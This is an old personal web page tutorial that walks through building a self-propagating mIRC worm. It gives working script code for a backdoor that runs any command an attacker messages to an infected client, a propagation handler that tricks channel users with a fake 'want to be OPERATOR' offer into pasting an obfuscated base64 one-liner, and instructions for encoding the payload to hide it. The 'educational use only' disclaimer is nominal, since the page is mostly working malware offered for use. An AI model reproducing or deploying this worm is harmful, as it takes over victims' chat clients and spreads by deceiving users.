Google

Go as far as you can see, and when you get there you'll see further.
-
Persian Proverb

 
 




IRC Self-Propagating Script

In this tutorial I will try to show a method to make a self replicating script for mIRC. This tutorial is for educational use only, to explore how mIRC script works and how you can protect yourself against these threats. The author does not take any responsibility for the damages one can cause using this script. If you do not agree with these terms I suggest you stop reading this tutorial.


Tutorial mIRC Self-Propagating Script

First of all I need to notice you that this script is allows remote controlling the client. This means that people (eventually bots), that have this script running, can be controlled by you via IRC. It is possible for the script to propagate in a natural way.

Get Started

It all starts with the next command:

//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA9PSAkbWUpKSB7IC
4gJCsgJDItIHwgaGFsdGRlZiB9IHwgZWxzZWlmICgoYSogaXN3bSA
kMS0pICYmICgkY2hhbikpIHsgLm1zZyBtYWIgaW5mIHwgLm1zZyAk
bmljayBXYW50IHRvIGJlIE9QRVJBVE9SIGluICRjaGFuIGNvcHkvc
GFzdGUgdGhpcy0+IAM0Ly93cml0ZSAuICQgJCsgZGVjb2RlKCAkKy
AkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGN
ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc

This in one line!

Understand the Script

We need to mix these two things:

The Self-Propagating Part (IRC Worm)

on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

Here is #mab the channel you want to let them join if they've installed the script. But since that would not be very efficient in most cases, we can do it in another way. We let it message you. We change the .timer 0 120 .join #mab with .msg mab_ inf. Where mab_ is your nickname.

With this your self replicating and self propagating script has started, it will now try to spread the script, it will try to personal message some people saying 'itself', while ignoring people. Done that it will try to send itself to other users, and tell them to type the command.

Now we are going to change some things about it so the functionality of the control script is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the script user. Once the script is implemented that is not the objective, so we will remove that from the script. So after this changes we get the next script that we have to merge with the remote control script:

on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }

The Remote Access (control) Part

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Mixed they will give us the self propagating remote control script. This means that the script will spread itself, join the certain channel (here: #mab) and after that it will spread itself, and next to that wait for you to control it remotely. So you will have the ability to obtain complete remote access to the client, using mIRC.

I will now try to give more details about that script. So you truly understand this script. In this way it can be easily modified. I will mix it.

So basically we want to mix these two “mechanisms”:

on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }

Solution:

on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE
}

In one line:

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }

Where here is DO SOMETHING the remote control part's work and DO SOMETHING ELSE the self propagating part's work.

Integrated (Two parts joined together):

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }

Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?

//echo -a $asc(char here)

If this gives a bad result this means that the char must be written in another way.

Example encoding of “,”:

//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct

Note:

$+ = pasting two strings together

| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)

Sometimes this method is not needed.

For finding the numbers you use this:

//echo -a $asc($?)

This will pop up an input box, just fill in the char and you’ll get the number as result.

It's possible to $encoding now, without bugs. So this is what we get before we start encoding:

on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125)

So:

//say $encode(on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125),m)

For finding the $encoded variable we split it up as global variables. The variables are set with

/set %var STRING

So for finding it we write the next in mIRC:

//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)

But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line.

We find the next as result:

b24gXio6dGV4dDoqOio6IHsgaWYgKChpbnMqIGlzd20gJDEtKSAmJ
iAoJHRhcmdldCA9PSAkbWUpKSB7IC4gJCsgJDItIHwgaGFsdGRlZi
B9IHwgZWxzZWlmICgoYSogaXN3bSAkMS0pICYmICgkY2hhbikpIHs
gLm1zZyBtYWIgaW5mIHwgLm1zZyAkbmljayBXYW50IHRvIGJlIE9Q
RVJBVE9SIGluICRjaGFuIGNvcHkvcGFzdGUgdGhpcy0+IAM0Ly93c
ml0ZSAuICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3
JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyB
9IH0=

This is the encoded command in one line of code.

 

Still questions?

Ask on IRC!


 
 

home | chat | about me | e-mail

Mabsoft Copyright 2015 Mabsoft. All Rights Reserved.

 



Live chat now on IRC... Click here to start the applet.



Sign my Guestbook... Click here for going to the guestbook section.



Net Tools 5.0, the latest public version of NetTools. ... Click here for more info.